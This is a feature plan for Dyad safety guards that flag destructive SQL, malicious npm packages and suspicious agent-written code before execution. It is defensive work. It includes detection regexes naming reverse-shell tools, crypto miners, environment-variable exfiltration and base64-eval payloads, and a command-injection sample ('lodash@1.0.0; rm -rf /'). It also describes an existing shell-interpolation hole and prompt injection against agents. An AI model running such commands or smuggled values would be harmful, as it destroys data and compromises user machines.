Dangerous Action Guards

plans/dangerous-action-guards.md

Generated by swarm planning session on 2026-02-14

Summary

Add automatic safety guards that detect and warn users before executing dangerous actions -- destructive SQL queries, malicious npm packages, and suspicious code patterns -- even when auto-approve is enabled. Includes a "dangerous approval override" toggle for power users who want to bypass all safety checks.

Problem Statement

Users building apps with Dyad can inadvertently (or through prompt injection) execute destructive actions. Today, Dyad's only defense is the consent banner ("Allow once / Always allow / Decline"), which users frequently bypass with auto-approve or "Always allow" settings. Once bypassed, there is zero validation:

  • SQL queries run as-is -- a single DROP TABLE can destroy hours of work
  • Package names are passed directly to shell commands with no validation (and there is an existing command injection vulnerability in executeAddDependency.ts)
  • File writes from the LLM are completely unscanned

The LLM is an untrusted actor. Prompt injection, hallucination, and model errors can generate destructive operations the user never intended. Auto-approve removes the last line of defense. Users trust Dyad to help them build safely.

Scope

In Scope (MVP)

  1. Dangerous SQL detection -- Heuristic pattern matching for destructive SQL operations (DROP, TRUNCATE, DELETE without WHERE, etc.). Force an enhanced consent prompt even if auto-approve is enabled.
  2. Malicious npm package detection -- Input sanitization (fix command injection vulnerability), registry existence check pre-install, npm audit post-install for known CVEs.
  3. Narrow code injection scanning -- High-confidence pattern detection for reverse shells, crypto miners, credential exfiltration, and obfuscated eval payloads. Near-zero false positive tolerance.
  4. Enhanced consent banner -- Danger variant with red/destructive styling, human-readable explanations, and two-button design (no "Always allow" for dangerous actions).
  5. Dangerous approval override -- Settings toggle to skip all danger checks, with confirmation dialog requiring typed acknowledgment and persistent UI indicator when active.
  6. package.json write detection -- When write_file or search_replace targets package.json, run the same package validation on newly-added dependencies.
  7. Telemetry -- Track danger detections, categories, and user decisions (allow/decline) to tune false positive rates.

Out of Scope (Follow-up)

  • LLM-based SQL semantic analysis (expensive, latency, provider dependency)
  • Comprehensive code security scanning beyond the narrow pattern set
  • MCP tool danger detection (MCP tools are opaque -- we don't control their behavior)
  • Typosquatting detection (requires maintaining/fetching popular package lists)
  • Sandboxed SQL execution / dry-run mode
  • Build-mode proposal security risk interception (separate code path from tool consent)
  • Per-category danger guard enable/disable in settings

User Stories

  • As a user with auto-approve enabled, I want Dyad to still warn me before executing destructive SQL so that I don't accidentally lose data.
  • As a user building with Supabase, I want to see exactly why a SQL query was flagged as dangerous so that I can make an informed decision to proceed or decline.
  • As a user adding dependencies, I want Dyad to warn me if a package is known-malicious or has known vulnerabilities so that I don't introduce security issues into my app.
  • As a user, I want to see a clear explanation of why an action was flagged so that I can dismiss false positives confidently.
  • As a power user, I want to disable danger checks entirely so that I can work without interruption when I know what I'm doing.
  • As a user reviewing agent actions (auto-approve OFF), I want danger context in the consent banner so that I can make better-informed decisions about which actions to allow.

UX Design

User Flow

Flow 1: Dangerous SQL detected (auto-approve ON)

  1. User has auto-approve enabled and is iterating on their app
  2. Agent generates a SQL query (e.g., DROP TABLE users)
  3. dangerCheck on the SQL tool detects destructive pattern
  4. Instead of auto-executing, the system intercepts and shows a danger consent banner
  5. Banner shows: "Auto-approve paused: this query will permanently delete the users table and all its data"
  6. User clicks "Allow anyway" (destructive style) or "Decline" (default focus)
  7. If approved, execution continues; if declined, the agent gets feedback that the action was blocked

Flow 2: Dangerous SQL detected (auto-approve OFF)

  1. Agent generates a destructive SQL query
  2. dangerCheck detects the pattern
  3. The normal consent banner is shown but with enhanced danger styling (red border, ShieldAlert icon, explanation text)
  4. User reviews and decides with better context than the standard consent banner provides

Flow 3: Malicious npm package detected

  1. Agent attempts to install a package
  2. Package name is validated (sanitization regex) -- invalid names are rejected immediately
  3. Registry existence check confirms the package exists
  4. If the consent banner fires (ask mode or danger-escalated), it includes package metadata
  5. After installation, npm audit --json runs and parses results
  6. If vulnerabilities found: critical/high severity shows red danger banner; moderate/low shows amber warning banner
  7. User reviews advisory details and decides

Flow 4: Suspicious code detected

  1. Agent writes code via write_file, edit_file, or search_replace
  2. Content is scanned against the high-confidence pattern set
  3. If a pattern matches, a danger banner appears showing the filename, flagged snippet, and a specific explanation (e.g., "This code appears to open a reverse shell connection to an external server")
  4. User reviews and decides

Flow 5: Enabling dangerous approval override

  1. User navigates to Settings > Safety section
  2. Finds "Skip all danger checks" toggle (default: OFF)
  3. Toggling ON opens a confirmation dialog: "This will skip all safety warnings for dangerous SQL, suspicious packages, and potentially malicious code. Actions will proceed without review."
  4. Dialog requires typing "I understand" to confirm
  5. Once enabled, a persistent shield-off icon appears in the chat header/status bar
  6. Icon is clickable to jump back to the setting
  7. All danger checks are bypassed; normal consent flow still applies per tool settings

Key States

  • Default (no danger): Invisible. Zero friction. Actions proceed normally per consent settings.
  • Danger detected (auto-approve ON): Red/destructive banner with ShieldAlert icon, explanation, two buttons. Auto-approve paused.
  • Danger detected (auto-approve OFF): Enhanced consent banner with red styling and danger explanation. Same two buttons.
  • Warning detected (lower severity): Amber banner with AlertTriangle icon. Moderate/low npm advisories, DELETE with WHERE clause, etc.
  • Checking safety (async): Brief inline indicator ("Checking packages...") only for async checks like npm registry lookup. Not shown for instant checks (SQL regex).
  • Override active: Persistent shield-off indicator in chat header. All danger checks bypassed.
  • Check failed/unavailable: Fail-open with subtle notification: "Safety check unavailable -- proceeding." User knows the guard wasn't active.

Interaction Details

Danger consent banner:

  • Visually distinct from standard consent banner: red/destructive color scheme, ShieldAlert icon (not Bot icon)
  • Includes: category label ("Dangerous SQL" / "Vulnerable Package" / "Suspicious Code"), human-readable explanation, expandable content preview
  • Two buttons only: "Allow anyway" (destructive variant) and "Decline" (default style)
  • No "Always allow" option -- you cannot permanently approve dangerous actions by category
  • Not dismissible via X button -- only explicit button clicks
  • Takes priority in consent queue (dangerous items shown first)
  • When auto-approve is ON, banner copy reads "Auto-approve paused: [explanation]"

Keyboard navigation:

  • "Decline" is default focused (Enter = safe action)
  • "Allow anyway" requires Tab + Enter (deliberate action)

Queue behavior:

  • If agent fires 5 actions with auto-approve, 4 safe ones auto-execute, 1 dangerous one pauses
  • Multiple dangerous actions in parallel: show sequentially with queue count
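
The priority rule for the consent queue can be sketched as a stable sort. This is only an illustration: the `PendingConsent` shape and the `orderConsentQueue` name are hypothetical, and only the `dangerInfo` field comes from this plan.

```typescript
// Hypothetical shape of a queued consent request; only `dangerInfo` is from the plan.
interface PendingConsent {
  requestId: string;
  dangerInfo: { level: "warning" | "danger" } | null;
}

// Dangerous requests come first; within each group the arrival order is kept.
function orderConsentQueue(queue: PendingConsent[]): PendingConsent[] {
  const rank = (r: PendingConsent): number => (r.dangerInfo ? 0 : 1);
  return queue
    .map((request, index) => ({ request, index }))
    .sort((a, b) => rank(a.request) - rank(b.request) || a.index - b.index)
    .map(({ request }) => request);
}

const ordered = orderConsentQueue([
  { requestId: "a", dangerInfo: null },
  { requestId: "b", dangerInfo: { level: "danger" } },
  { requestId: "c", dangerInfo: null },
  { requestId: "d", dangerInfo: { level: "warning" } },
]);
console.log(ordered.map((r) => r.requestId).join(",")); // b,d,a,c
```

Sorting on the original index as a tie-breaker keeps the order deterministic even on engines where `Array.prototype.sort` is not stable.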

Danger explanation quality (required templates):

| Pattern | Explanation Template |
| --- | --- |
| DROP TABLE x | "This query will permanently delete the {table} table and all its data" |
| DROP DATABASE x | "This query will permanently delete the entire {database} database" |
| TRUNCATE x | "This query will delete all rows from the {table} table" |
| DELETE FROM x (no WHERE) | "This query will delete all rows from the {table} table" |
| ALTER TABLE x DROP COLUMN y | "This query will permanently remove the {column} column from the {table} table" |
| GRANT / REVOKE | "This query modifies database permissions" |
| npm critical/high advisory | "Package {name} has a known vulnerability: {advisory_title} (severity: {severity})" |
| npm moderate/low advisory | "Package {name} has a known advisory: {advisory_title} (severity: {severity})" |
| Reverse shell pattern | "This code appears to open a reverse shell connection to an external server" |
| Crypto miner pattern | "This code contains patterns associated with cryptocurrency mining" |
| Credential exfiltration | "This code appears to send environment variables to an external URL" |
| Obfuscated eval | "This code contains an obfuscated execution pattern (base64-decoded eval)" |
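
One way the explanation templates could be filled in is simple placeholder substitution. The sketch below is an assumption about how that might look: the template keys and the `renderExplanation` helper are hypothetical, while the template strings are copied from the table above.

```typescript
// Keys are illustrative; the template text is taken from the plan's table.
const EXPLANATION_TEMPLATES = {
  drop_table: "This query will permanently delete the {table} table and all its data",
  drop_column: "This query will permanently remove the {column} column from the {table} table",
  npm_high: "Package {name} has a known vulnerability: {advisory_title} (severity: {severity})",
} as const;

type TemplateKey = keyof typeof EXPLANATION_TEMPLATES;

// Replace each {placeholder} with its value. Unknown placeholders are left
// visible so that a missing value is obvious in tests and in review.
function renderExplanation(key: TemplateKey, values: Record<string, string>): string {
  return EXPLANATION_TEMPLATES[key].replace(/\{(\w+)\}/g, (match: string, field: string) =>
    Object.prototype.hasOwnProperty.call(values, field) ? values[field] ?? match : match,
  );
}

const dropTableMessage = renderExplanation("drop_table", { table: "users" });
console.log(dropTableMessage);
// This query will permanently delete the users table and all its data
```

Leaving an unfilled `{column}` in the output, rather than substituting an empty string, avoids showing the user a sentence that silently lost its subject.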

Accessibility

  • Not color-alone: danger banner differs via icon (ShieldAlert vs Bot), text label ("Potentially dangerous" vs standard), AND color
  • aria-live="polite" on danger banner (not "assertive" -- the agent is paused, no urgency to interrupt)
  • Focus moves to danger banner when it appears; returns to chat input on resolution
  • "Skip all danger checks" toggle associated with aria-describedby pointing to warning text
  • Confirmation dialog is keyboard-navigable and screen-reader announced

Technical Design

Architecture

Add a dangerCheck method to the existing ToolDefinition interface. This runs before consent and can escalate the consent level from "always" to forced-ask with danger context. The detection logic is per-tool (each tool knows its domain), while the consent escalation is centralized in buildAgentToolSet.

Tool invocation → dangerCheck() → if dangerous, force consent with dangerInfo
                                → if safe, proceed with normal consent flow

New module: src/pro/main/ipc/handlers/local_agent/danger_detection/ containing:

  • sql_heuristics.ts -- SQL pattern matching
  • npm_validation.ts -- Package name sanitization + registry/audit checks
  • code_scanning.ts -- High-confidence malicious code patterns
  • types.ts -- Shared types (DangerCheckResult)

Components Affected

| Component | File(s) | Change Type |
| --- | --- | --- |
| Tool definition types | tools/types.ts | Add dangerCheck to ToolDefinition interface |
| Tool set builder | tool_definitions.ts | Wire dangerCheck into execute wrapper, pass dangerInfo to consent request |
| SQL tool | tools/execute_sql.ts | Add SQL danger heuristics via dangerCheck |
| Dependency tool | tools/add_dependency.ts | Add package validation via dangerCheck |
| Dependency processor | executeAddDependency.ts | Fix command injection: use execFile with array args; add post-install npm audit |
| File write tools | tools/write_file.ts, tools/edit_file.ts, tools/search_replace.ts | Add code scanning via dangerCheck; add package.json filename detection |
| Settings schema | src/lib/schemas.ts | Add dangerousApprovalOverride field |
| Settings UI | New "Safety" section in settings | Toggle with confirmation dialog |
| Consent banner | AgentConsentBanner.tsx | Danger variant (red styling, two buttons, explanation, priority queue) |
| Consent types | IPC payload types | Add dangerInfo to consent request |
| Chat UI | Chat header/status area | Persistent shield-off indicator when override is active |
| Telemetry | Agent handler | Emit danger detection events |

Data Model Changes

UserSettings additions (in schemas.ts):

```typescript
dangerousApprovalOverride: z.boolean().optional(), // default: false
```

New types:

```typescript
interface DangerCheckResult {
  level: "warning" | "danger";
  category: "destructive_sql" | "malicious_package" | "suspicious_code";
  message: string; // Human-readable explanation (required, specific)
  details?: string; // Extended details (full query, advisory URL, etc.)
}
```

Extended consent request payload:

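```typescript
// Payload of the agent-tool:consent-request IPC event.
// The interface name is illustrative; the plan only specifies the fields.
interface AgentToolConsentRequest {
  requestId: string;
  chatId: number;
  toolName: string;
  toolDescription: string;
  inputPreview: string;
  dangerInfo: DangerCheckResult | null; // NEW
}
```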

Extended ToolDefinition interface:

```typescript
interface ToolDefinition<T> {
  // ... existing fields ...
  dangerCheck?: (
    args: T,
    ctx: AgentContext,
  ) => Promise<DangerCheckResult | null>;
}
```

API Changes

  • Modified buildAgentToolSet execute wrapper: Before calling requireConsent, run dangerCheck. If result is non-null and dangerousApprovalOverride is not enabled, force consent to "ask" and include dangerInfo in the consent request payload.
  • Modified consent request IPC: Add dangerInfo field to agent-tool:consent-request event.
  • Modified consent response: When dangerInfo is present, only accept "accept-once" or "decline" (no "accept-always").
  • New telemetry events: danger_check:detected and danger_check:user_decision with category, tool name, and user decision, plus danger_check:override for override enable/disable events.
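
The escalation rule in the first and third bullets can be sketched as a pure function. This is a minimal sketch under stated assumptions: `ToolConsent`, `ConsentPlan`, and `planConsent` are hypothetical names, and the real wiring inside buildAgentToolSet may look different.

```typescript
interface DangerCheckResult {
  level: "warning" | "danger";
  category: "destructive_sql" | "malicious_package" | "suspicious_code";
  message: string;
  details?: string;
}

type ToolConsent = "always" | "ask"; // assumed subset of the per-tool consent settings
type ConsentResponse = "accept-once" | "accept-always" | "decline";

interface ConsentPlan {
  mode: ToolConsent;
  dangerInfo: DangerCheckResult | null;
  allowedResponses: ConsentResponse[];
}

// Decide how to ask for consent given the configured mode, the dangerCheck
// result, and the dangerousApprovalOverride setting.
function planConsent(
  configured: ToolConsent,
  danger: DangerCheckResult | null,
  overrideEnabled: boolean,
): ConsentPlan {
  if (danger !== null && !overrideEnabled) {
    // Dangerous: always ask, and never offer "accept-always".
    return { mode: "ask", dangerInfo: danger, allowedResponses: ["accept-once", "decline"] };
  }
  // Safe, or override active: fall back to the normal consent flow.
  return {
    mode: configured,
    dangerInfo: null,
    allowedResponses: ["accept-once", "accept-always", "decline"],
  };
}

const sampleDanger: DangerCheckResult = {
  level: "danger",
  category: "destructive_sql",
  message: "This query will permanently delete the users table and all its data",
};
const escalated = planConsent("always", sampleDanger, false);
console.log(escalated.mode, escalated.allowedResponses.join("|")); // ask accept-once|decline
```

Keeping the decision in a pure function makes the "accept-always is never offered for dangerous actions" rule easy to cover with unit tests, independent of the IPC layer.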

SQL Danger Heuristics

Patterns to detect (case-insensitive, ignoring SQL comments):

| Pattern | Level | Template |
| --- | --- | --- |
| DROP TABLE | danger | "permanently delete the {table} table" |
| DROP DATABASE | danger | "permanently delete the entire {database} database" |
| TRUNCATE TABLE | danger | "delete all rows from the {table} table" |
| DELETE FROM without WHERE | danger | "delete all rows from the {table} table" |
| ALTER TABLE ... DROP COLUMN | warning | "permanently remove the {column} column" |
| GRANT / REVOKE | warning | "modifies database permissions" |
| DROP SCHEMA / DROP INDEX | warning | "permanently delete database object" |

Implementation notes:

  • Strip SQL comments (--, /* */) before pattern matching to prevent bypass
  • Handle multi-statement queries (split on ; and check each)
  • Sub-millisecond execution (regex only, no parsing)
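
The implementation notes above could be sketched roughly as follows. This is not the planned sql_heuristics.ts: the function names and the exact regexes are assumptions, only a few of the patterns are covered, and splitting on `;` does not account for semicolons or comment markers inside string literals.

```typescript
type Level = "warning" | "danger";

interface SqlFinding {
  level: Level;
  message: string;
}

// Remove "-- line" and "/* block */" comments. String literals are not parsed,
// so comment markers inside quoted text are stripped too (a limit of this sketch).
function stripSqlComments(sql: string): string {
  return sql.replace(/\/\*[\s\S]*?\*\//g, " ").replace(/--[^\n]*/g, " ");
}

// Check a single, trimmed statement against a subset of the plan's patterns.
function checkStatement(statement: string): SqlFinding | null {
  let m = statement.match(/^DROP\s+TABLE\s+(?:IF\s+EXISTS\s+)?([\w."]+)/i);
  if (m) {
    return { level: "danger", message: `This query will permanently delete the ${m[1]} table and all its data` };
  }
  m = statement.match(/^TRUNCATE\s+(?:TABLE\s+)?([\w."]+)/i);
  if (m) {
    return { level: "danger", message: `This query will delete all rows from the ${m[1]} table` };
  }
  m = statement.match(/^DELETE\s+FROM\s+([\w."]+)/i);
  if (m && !/\bWHERE\b/i.test(statement)) {
    return { level: "danger", message: `This query will delete all rows from the ${m[1]} table` };
  }
  m = statement.match(/^ALTER\s+TABLE\s+([\w."]+)\s+DROP\s+COLUMN\s+([\w."]+)/i);
  if (m) {
    return { level: "warning", message: `This query will permanently remove the ${m[2]} column from the ${m[1]} table` };
  }
  return null;
}

// Strip comments, split into statements, and collect one finding per dangerous statement.
function checkSql(sql: string): SqlFinding[] {
  return stripSqlComments(sql)
    .split(";")
    .map((s) => s.trim())
    .filter((s) => s.length > 0)
    .map((s) => checkStatement(s))
    .filter((f): f is SqlFinding => f !== null);
}

const findings = checkSql(
  "-- DROP TABLE a\nDELETE FROM logs WHERE id = 1; drop table Users; DELETE FROM logs",
);
console.log(findings.length); // 2
```

Anchoring each pattern at the start of the statement keeps SQL keywords that appear inside data values from triggering a match, at the cost of missing destructive statements nested in a CTE or a procedure body.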

npm Package Validation

Pre-install (in dangerCheck):

  1. Validate package name against npm naming rules: ^(@[a-z0-9-~][a-z0-9-._~]*/)?[a-z0-9-~][a-z0-9-._~]*(@.*)?$
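  2. Reject any name that doesn't match (prevents invalid packages and blocks shell metacharacters in the name itself). Note that the trailing (@.*)? accepts any characters after the @, so a string such as lodash@1.0.0; rm -rf / still matches; the version suffix needs its own restriction, and the execFile fix below remains necessary.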
  3. Fetch https://registry.npmjs.org/{package} to confirm existence and check deprecated flag
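
A rough sketch of the pre-install checks, assuming the name and the optional version are validated separately. The `VERSION` pattern, `parsePackageSpec`, and `registryUrl` are hypothetical and not part of the plan; the `%2F` encoding for scoped names follows the usual registry URL convention and should be verified before relying on it.

```typescript
// The plan's pattern, including its permissive "(@.*)?" version suffix.
const PLAN_PATTERN = /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*(@.*)?$/;

// Same name rule without the suffix, plus an assumed stricter version rule
// (semver-like versions, ranges, and dist-tags only).
const NAME = /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*$/;
const VERSION = /^[\w.^~<>=*+-]+$/;

interface PackageSpec {
  name: string;
  version: string | null;
}

// Split "name@version" on the last "@" (index 0 belongs to a scope) and validate both parts.
function parsePackageSpec(spec: string): PackageSpec | null {
  const at = spec.lastIndexOf("@");
  const name = at > 0 ? spec.slice(0, at) : spec;
  const version = at > 0 ? spec.slice(at + 1) : null;
  if (!NAME.test(name)) return null;
  if (version !== null && !VERSION.test(version)) return null;
  return { name, version };
}

// Registry metadata URL for the existence check; the scope slash is percent-encoded.
function registryUrl(name: string): string {
  return `https://registry.npmjs.org/${name.replace("/", "%2F")}`;
}

const hostile = "lodash@1.0.0; rm -rf /";
console.log(PLAN_PATTERN.test(hostile)); // true
console.log(parsePackageSpec(hostile)); // null
console.log(parsePackageSpec("@types/node@20.1.0")); // name "@types/node", version "20.1.0"
```

The first two log lines show the gap this split is meant to close: the combined pattern accepts the hostile string because everything after the first `@` is unconstrained.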

Post-install (in executeAddDependency):

  1. Run npm audit --json or pnpm audit --json in the app directory
  2. Parse output for new vulnerabilities
  3. If critical/high: show danger banner with advisory details
  4. If moderate/low: show warning banner
  5. Cache advisory data locally with 24-hour TTL for repeated installs
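
The severity mapping in steps 3 and 4 might look like the sketch below. It assumes the audit JSON exposes per-severity counts under `metadata.vulnerabilities`, which should be checked against the npm and pnpm versions actually in use; `levelFromAuditJson` is a hypothetical name, and the sketch does not separate new vulnerabilities from ones that existed before the install.

```typescript
type Level = "warning" | "danger";

interface SeverityCounts {
  low?: number;
  moderate?: number;
  high?: number;
  critical?: number;
}

// Assumed report shape: only the fields this sketch reads.
interface AuditReportLike {
  metadata?: { vulnerabilities?: SeverityCounts };
}

// Map an audit report to the plan's levels:
// critical/high -> "danger", moderate/low -> "warning", nothing found -> null.
function levelFromAuditJson(json: string): Level | null {
  const report = JSON.parse(json) as AuditReportLike;
  const counts: SeverityCounts = report.metadata?.vulnerabilities ?? {};
  if ((counts.critical ?? 0) > 0 || (counts.high ?? 0) > 0) return "danger";
  if ((counts.moderate ?? 0) > 0 || (counts.low ?? 0) > 0) return "warning";
  return null;
}

const sampleReport = JSON.stringify({
  metadata: { vulnerabilities: { low: 2, moderate: 0, high: 1, critical: 0 } },
});
console.log(levelFromAuditJson(sampleReport)); // danger
```

To report only vulnerabilities introduced by the install, one option is to run the audit before and after and compare the two results, which this sketch leaves out.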

Command injection fix (immediate, independent):

  • Replace exec(`pnpm add ${packageStr}`) with execFile("pnpm", ["add", ...packages]) or equivalent
  • Validate all package name strings before any shell interaction
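
A minimal sketch of the fix, assuming validation happens immediately before the process is spawned. To keep the example self-contained, the process launcher is passed in as a function; in Dyad this would presumably be a thin wrapper around Node's `execFile`, which passes arguments as an array without going through a shell. `ExecFileLike`, `SAFE_SPEC`, and `addPackages` are hypothetical names.

```typescript
// Stand-in for Node's execFile(file, args): arguments are passed as an array.
type ExecFileLike = (file: string, args: string[]) => void;

// Name rule from the plan with an assumed, stricter version suffix.
const SAFE_SPEC =
  /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*(@[\w.^~<>=*+-]+)?$/;

// Validate every package string, then pass them as separate argv entries.
function addPackages(packages: string[], run: ExecFileLike): void {
  const invalid = packages.filter(
    // Extra precaution (not in the plan): a leading "-" would be read as a CLI flag.
    (p) => p.startsWith("-") || !SAFE_SPEC.test(p),
  );
  if (invalid.length > 0) {
    throw new Error(`Invalid package name(s): ${invalid.join(", ")}`);
  }
  run("pnpm", ["add", ...packages]);
}

// Usage with a recording fake instead of a real process launcher.
const calls: string[][] = [];
addPackages(["react", "@types/node@20.1.0"], (file, args) => {
  calls.push([file, ...args]);
});
console.log(calls[0].join(" ")); // pnpm add react @types/node@20.1.0
```

Because each package is its own argv entry, characters such as `;` or `&&` are never interpreted by a shell, and the regex check then serves as a second layer rather than the only defense.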

Code Injection Patterns

High-confidence, near-zero false positive patterns:

```typescript
const DANGER_PATTERNS = [
  // Reverse shells
  {
    pattern: /\b(nc|ncat|netcat)\s+-[a-z]*e\s/i,
    message: "reverse shell connection",
  },
  { pattern: /\/dev\/tcp\//, message: "reverse shell connection" },
  {
    pattern: /child_process.*?(exec|spawn).*?(bash|sh|cmd|powershell)/s,
    message: "shell execution",
  },

  // Crypto miners
  {
    pattern: /\b(coinhive|cryptonight|stratum\+tcp|xmrig)\b/i,
    message: "cryptocurrency mining",
  },

  // Credential exfiltration
  {
    pattern: /process\.env\b.*?\bfetch\s*\(/s,
    message: "environment variable exfiltration",
  },
  {
    pattern: /process\.env\b.*?\bhttp/s,
    message: "environment variable exfiltration",
  },

  // Obfuscated payloads
  { pattern: /\batob\s*\(.*?\beval\b/s, message: "obfuscated code execution" },
  {
    pattern: /Buffer\.from\s*\([^)]+,\s*['"]base64['"]\).*?\beval\b/s,
    message: "obfuscated code execution",
  },
];
```

Applied to content in write_file, edit_file (edit sketch content), and search_replace (replacement content). Not applied to the full file to avoid false positives from existing code.
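
A scanner over such patterns could be as small as the sketch below. It uses only three of the patterns, the `CodeFinding` shape is an assumption, and `[\s\S]*?` is written in place of the `s` flag so that the example also compiles for older targets.

```typescript
interface CodeFinding {
  message: string;
  snippet: string; // Start of the matched text, truncated for display
}

// Subset of the plan's patterns; "[\s\S]" is used in place of the "s" flag.
const SCAN_PATTERNS: { pattern: RegExp; message: string }[] = [
  { pattern: /\/dev\/tcp\//, message: "reverse shell connection" },
  { pattern: /\b(coinhive|cryptonight|stratum\+tcp|xmrig)\b/i, message: "cryptocurrency mining" },
  { pattern: /\batob\s*\([\s\S]*?\beval\b/, message: "obfuscated code execution" },
];

// Scan only the newly written content; report at most one finding per pattern.
function scanContentForDangers(content: string): CodeFinding[] {
  const results: CodeFinding[] = [];
  for (const { pattern, message } of SCAN_PATTERNS) {
    const match = pattern.exec(content);
    if (match) {
      results.push({ message, snippet: match[0].slice(0, 120) });
    }
  }
  return results;
}

const shellFindings = scanContentForDangers("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");
console.log(shellFindings.map((f) => f.message).join(",")); // reverse shell connection
console.log(scanContentForDangers("const total = items.length;").length); // 0
```

One limitation of the `atob` pattern as written is that it only matches when `atob(` appears before `eval`, so the nested form `eval(atob("..."))` is not flagged; the unit test corpus should probably include that case.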

Implementation Plan

Phase 0: Security Fix (Independent, Ship Immediately)

  • Fix command injection in executeAddDependency.ts -- replace string interpolation with execFile array args or validate package names with regex before shell execution
  • Add unit tests for package name validation

Phase 1: Foundation

  • Add dangerCheck field to ToolDefinition interface in tools/types.ts
  • Add DangerCheckResult type to danger_detection/types.ts
  • Wire dangerCheck into buildAgentToolSet execute wrapper -- run before consent, force "ask" if dangerous
  • Extend consent request IPC payload with dangerInfo: DangerCheckResult | null
  • Update AgentConsentBanner.tsx with danger variant: red styling, ShieldAlert icon, explanation text, two-button layout (no "Always allow"), priority queue ordering, not X-dismissible
  • Add aria-live="polite", focus management, keyboard defaults (Decline focused)
  • Add danger detection telemetry: danger_check:detected, danger_check:user_decision

Phase 2: SQL Danger Heuristics

  • Implement sql_heuristics.ts with pattern matching for destructive operations
  • Add dangerCheck to executeSqlTool that calls SQL heuristics
  • Handle SQL comment stripping, multi-statement queries
  • Add human-readable explanation templates with table/column name extraction
  • Unit tests: corpus of dangerous and safe SQL, edge cases (DROP in comments, DELETE with complex WHERE, multi-statement)

Phase 3: npm Package Validation

  • Implement npm_validation.ts with package name sanitization regex
  • Add pre-install registry existence check (https://registry.npmjs.org/{package})
  • Add dangerCheck to addDependencyTool for pre-install validation
  • Add post-install npm audit --json / pnpm audit --json parsing in executeAddDependency.ts
  • Map npm advisory severity to danger levels (critical/high = danger, moderate/low = warning)
  • Add local caching for advisory data (24-hour TTL)
  • Handle @version suffix in package names
  • Unit tests: valid/invalid names, known vulnerable packages (mocked registry), severity mapping

Phase 4: Code Injection Scanning

  • Implement code_scanning.ts with high-confidence pattern set
  • Add shared scanContentForDangers(content: string) function
  • Add dangerCheck to writeFileTool, editFileTool, searchReplaceTool
  • For edit_file: scan the edit sketch content, not the final merged file
  • Add package.json detection: if target file is package.json, parse diff and run npm validation on new dependencies
  • Per-pattern explanation templates
  • Unit tests: known malicious patterns, legitimate code that looks suspicious (build tools, base64 in tests)
  • Performance benchmark: verify sub-millisecond execution for regex patterns
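
For the package.json detection step, finding the newly added dependencies can be sketched as a key diff between the old and new file contents. `newlyAddedDependencies` is a hypothetical helper; it returns names only, so version specs (including `npm:` aliases) would need separate handling.

```typescript
type DepMap = Record<string, string>;

interface PackageJsonLike {
  dependencies?: DepMap;
  devDependencies?: DepMap;
}

// Return dependency names present in the new package.json but not in the old one.
// A package moved between dependencies and devDependencies is not treated as new.
function newlyAddedDependencies(beforeJson: string, afterJson: string): string[] {
  const before = JSON.parse(beforeJson) as PackageJsonLike;
  const after = JSON.parse(afterJson) as PackageJsonLike;
  const known = new Set<string>([
    ...Object.keys(before.dependencies ?? {}),
    ...Object.keys(before.devDependencies ?? {}),
  ]);
  const candidates = [
    ...Object.keys(after.dependencies ?? {}),
    ...Object.keys(after.devDependencies ?? {}),
  ];
  return candidates.filter((dep) => !known.has(dep));
}

const added = newlyAddedDependencies(
  JSON.stringify({ dependencies: { react: "^18.0.0" } }),
  JSON.stringify({
    dependencies: { react: "^18.0.0", "left-pad": "1.3.0" },
    devDependencies: { vitest: "^1.0.0" },
  }),
);
console.log(added.join(",")); // left-pad,vitest
```

Each returned name can then go through the same pre-install validation used by the dependency tool.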

Phase 5: Dangerous Approval Override

  • Add dangerousApprovalOverride: boolean to BaseUserSettingsFields in schemas.ts (default: false)
  • Wire override check into buildAgentToolSet -- skip dangerCheck when enabled
  • Add "Safety" section in settings UI, visually separated from auto-approve
  • Implement confirmation dialog with "I understand" text input requirement
  • Add persistent shield-off indicator in chat header when override is active (clickable to jump to setting)
  • Add telemetry for override enable/disable events
  • Consider auto-expiry on app update (re-prompt user to re-enable)

Testing Strategy

  • Unit tests for SQL heuristics: Corpus of 50+ dangerous and safe SQL queries. Edge cases: DROP inside comments, DELETE with complex WHERE clauses, multi-statement queries, case variations, GRANT/REVOKE.
  • Unit tests for npm validation: Valid package names, invalid/malicious names, @scope/package format, package@version format, names with special characters (command injection attempts).
  • Unit tests for code scanning: Known malicious patterns, legitimate code that resembles patterns (build tools using eval, base64 in unit tests, process.env in config files).
  • Integration tests: Verify that dangerCheck results flow through the consent system correctly -- forced consent shows danger banner even when consent is "always", danger info appears in banner, "accept-always" is not an option.
  • E2E tests: Simulate agent attempting dangerous SQL with auto-approve ON; verify danger banner appears with correct explanation. Test override toggle flow.
  • Regression tests: Ensure existing auto-approve workflows are not broken for non-dangerous operations. Verify zero-friction happy path.
  • Performance tests: Benchmark SQL heuristics and code scanning to verify sub-millisecond execution on typical inputs.

Risks & Mitigations

| Risk | Likelihood | Impact | Mitigation |
| --- | --- | --- | --- |
| False positives erode user trust | HIGH | HIGH | Start with very high-confidence patterns only. Track override rates via telemetry. Remove patterns that produce false positives. |
| Command injection via package names (EXISTING) | HIGH | HIGH | Fix immediately in Phase 0, independent of feature work. Use execFile with array args. |
| Override + auto-approve = zero guardrails | MEDIUM | HIGH | Track this state in telemetry. Consider auto-expiry on app update. Persistent UI indicator. |
| Narrow code scanning creates false sense of security | MEDIUM | MEDIUM | Honest messaging: "checks for common malicious patterns" not "security scanning." Document known limitations. |
| npm audit coverage gaps (no typosquats, zero-days) | MEDIUM | MEDIUM | Accept as known limitation. Document. Consider Socket.dev integration in v2. |
| Performance impact on file writes from code scanning | LOW | MEDIUM | Regex-only patterns (sub-millisecond). Benchmark before shipping. |
| Bypass via indirect paths (write benign script that downloads malware) | MEDIUM | LOW | Fundamental limitation of static analysis. Accept and document. |
| npm registry/audit API unavailable (offline/outage) | LOW | LOW | Fail-open with notification: "Safety check unavailable -- proceeding." |
| Pattern list goes stale as threats evolve | LOW | MEDIUM | Keep pattern set small and high-signal. Easy to update (single file). |
| MCP tools bypass all danger checks | LOW | LOW | Document as known limitation. Out of scope for v1. |

Open Questions

  • Build mode coverage: The autoApproveChanges setting in build mode bypasses the proposal flow, including existing SecurityRisk warnings. This feature only covers local-agent mode. Should build mode be covered in v2?
  • npm: protocol aliases: package.json edits could use an alias entry of the form "my-pkg": "npm:<other-package>@<version>" to bypass name validation. Should we parse these in the package.json detection?
